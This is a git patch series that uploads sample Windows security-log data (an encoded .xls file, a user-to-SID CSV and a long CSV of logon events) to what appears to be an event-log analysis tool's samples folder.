From 3d16d1ba905d1283d27faaf43a2f8358e3e934d1 Mon Sep 17 00:00:00 2001 From: pex7hfbnt <1584881064@qq.com> Date: Wed, 16 Oct 2024 23:39:31 +0800 Subject: [PATCH 01/13] ADD file via upload --- source/samples/EventID_Frequency_Analysis.xls | Bin 0 -> 10599 bytes 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 source/samples/EventID_Frequency_Analysis.xls diff --git a/source/samples/EventID_Frequency_Analysis.xls b/source/samples/EventID_Frequency_Analysis.xls new file mode 100644 index 0000000000000000000000000000000000000000..881d74b9258d63e6d149990fcf5d035cecca4fdc GIT binary patch literal 10599 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 Date: Wed, 16 Oct 2024 23:39:45 +0800 Subject: [PATCH 02/13] ADD file via upload --- source/samples/Sample_Collected-SIDS.csv | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 source/samples/Sample_Collected-SIDS.csv diff --git a/source/samples/Sample_Collected-SIDS.csv b/source/samples/Sample_Collected-SIDS.csv new file mode 100644 index 0000000..4428ecd --- /dev/null +++ b/source/samples/Sample_Collected-SIDS.csv @@ -0,0 +1,19 @@ +User,SID +01566S-WIN16-IR$,S-1-5-18 +ANONYMOUS LOGON,S-1-5-7 +IEUser,S-1-5-21-3461203602-4096304019-2269080069-1000 +Administrator,S-1-5-21-308926384-506822093-3341789130-500 +samir,S-1-5-21-308926384-506822093-3341789130-220106 +02694W-WIN10$,S-1-5-21-308926384-506822093-3341789130-84104 +Administrator,S-1-5-21-81107902-1099128984-1836738286-500 +EXCHANGE$,S-1-5-21-2895268558-4179327395-2773671012-1108 +IEUser,S-1-5-21-3583694148-1414552638-2922671848-1000 +lgrove,S-1-5-21-308926384-506822093-3341789130-101606 +a-jbrown,S-1-5-21-308926384-506822093-3341789130-1106 +user01,S-1-5-21-1587066498-1489273250-1035260531-1106 +Administrator,S-1-5-21-1587066498-1489273250-1035260531-500 +Administrator,S-1-5-21-1587066498-1489273250-1035260531-500 +sshd_server,S-1-5-21-3583694148-1414552638-2922671848-1002 +LOCAL SERVICE,S-1-5-19 +NETWORK SERVICE,S-1-5-20 +admin01,S-1-5-21-1587066498-1489273250-1035260531-1108 -- 2.34.1 From f87873afda0fc8f8a6644b072505a2d0d19771f7 Mon Sep 17 00:00:00 2001 From: pex7hfbnt <1584881064@qq.com> Date: Wed, 16 Oct 2024 23:39:58 +0800 Subject: [PATCH 03/13] ADD file via upload --- source/samples/Sample_Logon_Events.csv | 13814 +++++++++++++++++++++++ 1 file changed, 13814 insertions(+) create mode 100644 source/samples/Sample_Logon_Events.csv diff --git a/source/samples/Sample_Logon_Events.csv b/source/samples/Sample_Logon_Events.csv new file mode 100644 index 0000000..b0b9d60 --- /dev/null +++ b/source/samples/Sample_Logon_Events.csv @@ -0,0 +1,13814 @@ +Date and Time,timestamp,Event ID,Account Name,Account Domain,Logon Type,Logon Process,Source IP,Workstation Name,Computer Name,Channel,Original Event Log +2020-09-15T23:32:10.232423+04:00,1600198330.232423,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768628 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x32a0d3 + 3 + Kerberos + Kerberos + - + 6747BCF0-DBAA-F21C-878B-EB339B03FA80 + - + - + 0 + 0x0 + - + ::1 + 50441 + %%1840 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:31:34.957514+04:00,1600198294.957514,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768627 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x329baa + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50443 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:31:31.097681+04:00,1600198291.097681,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768622 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x320935 + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50438 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:31:04.688967+04:00,1600198264.688967,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768621 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-7 + ANONYMOUS LOGON + NT AUTHORITY + 0x31ff89 + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V1 + 128 + 0x0 + - + 172.16.66.37 + 49707 + %%1833 + - + - + - + %%1843 + 0x0 + %%1843 + +" +2020-09-15T23:30:32.190369+04:00,1600198232.190369,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768620 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-7 + ANONYMOUS LOGON + NT AUTHORITY + 0x31ff6e + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V1 + 128 + 0x0 + - + 172.16.66.37 + 49707 + %%1833 + - + - + - + %%1843 + 0x0 + %%1843 + +" +2020-09-15T23:29:51.517594+04:00,1600198191.517594,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768619 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x31fb1a + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50437 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:29:51.507713+04:00,1600198191.507713,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768618 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x31daf6 + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50436 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:32:10.232423+04:00,1600198330.232423,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768628 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x32a0d3 + 3 + Kerberos + Kerberos + - + 6747BCF0-DBAA-F21C-878B-EB339B03FA80 + - + - + 0 + 0x0 + - + ::1 + 50441 + %%1840 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:31:34.957514+04:00,1600198294.957514,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768627 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x329baa + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50443 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:31:31.097681+04:00,1600198291.097681,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768622 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x320935 + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50438 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:31:04.688967+04:00,1600198264.688967,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768621 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-7 + ANONYMOUS LOGON + NT AUTHORITY + 0x31ff89 + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V1 + 128 + 0x0 + - + 172.16.66.37 + 49707 + %%1833 + - + - + - + %%1843 + 0x0 + %%1843 + +" +2020-09-15T23:30:32.190369+04:00,1600198232.190369,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768620 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-7 + ANONYMOUS LOGON + NT AUTHORITY + 0x31ff6e + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V1 + 128 + 0x0 + - + 172.16.66.37 + 49707 + %%1833 + - + - + - + %%1843 + 0x0 + %%1843 + +" +2020-09-15T23:29:51.517594+04:00,1600198191.517594,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768619 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x31fb1a + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50437 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:29:51.507713+04:00,1600198191.507713,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768618 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x31daf6 + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50436 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4624,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 137225 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x79e59 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x1cd964 + 2 + Chrome + Negotiate + MSEDGEWIN10 + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1358 + C:\Program Files (x86)\Google\Chrome\Application\chrome.exe + - + - + %%1833 + - + - + - + %%1843 + 0x1cd8f6 + %%1843 + +" +2020-09-09T17:18:27.714758+04:00,1599657507.714758,4624,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 137224 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x79e59 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x1cd8f6 + 2 + Chrome + Negotiate + MSEDGEWIN10 + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1358 + C:\Program Files (x86)\Google\Chrome\Application\chrome.exe + - + - + %%1833 + - + - + - + %%1843 + 0x1cd964 + %%1842 + +" +2020-09-09T17:18:27.714613+04:00,1599657507.714613,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,-,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 137223 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + S-1-5-18 + SYSTEM + NT AUTHORITY + 0x3e7 + 5 + Advapi + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x25c + C:\Windows\System32\services.exe + - + - + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-09T17:18:25.377120+04:00,1599657505.37712,4625,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security," + + + + + 4625 + 0 + 0 + 12544 + 0 + 0x8010000000000000 + + + 137222 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x79e59 + S-1-0-0 + IEUser + MSEDGEWIN10 + 0xc000006d + %%2313 + 0xc000006a + 2 + Chrome + Negotiate + MSEDGEWIN10 + - + - + 0 + 0x1358 + C:\Program Files (x86)\Google\Chrome\Application\chrome.exe + - + - + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 769798 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x85516e + 3 + Kerberos + Kerberos + - + 063B0961-D1B7-6D2C-1FF3-98764C4FAC9D + - + - + 0 + 0x0 + - + ::1 + 53668 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-17T14:57:44.272505+04:00,1600340264.272505,4624,Administrator,3B,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 769794 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-500 + Administrator + 3B + 0x853237 + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.37 + 49959 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 769798 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x85516e + 3 + Kerberos + Kerberos + - + 063B0961-D1B7-6D2C-1FF3-98764C4FAC9D + - + - + 0 + 0x0 + - + ::1 + 53668 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-17T14:57:44.272505+04:00,1600340264.272505,4624,Administrator,3B,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 769794 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-500 + Administrator + 3B + 0x853237 + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.37 + 49959 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2021-12-07T21:33:01.619364+04:00,1638898381.619364,4624,IEUser,MSEDGEWIN10,9,seclogo,::1,-,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 329918 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x53ca2 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 9 + seclogo + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1bc4 + C:\Windows\System32\svchost.exe + ::1 + 0 + %%1833 + - + MalseclogonUser + MalseclogonDomain + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:32:10.232423+04:00,1600198330.232423,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768628 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x32a0d3 + 3 + Kerberos + Kerberos + - + 6747BCF0-DBAA-F21C-878B-EB339B03FA80 + - + - + 0 + 0x0 + - + ::1 + 50441 + %%1840 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:31:34.957514+04:00,1600198294.957514,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768627 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x329baa + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50443 + %%1833 + - + - + - + %%1843 + 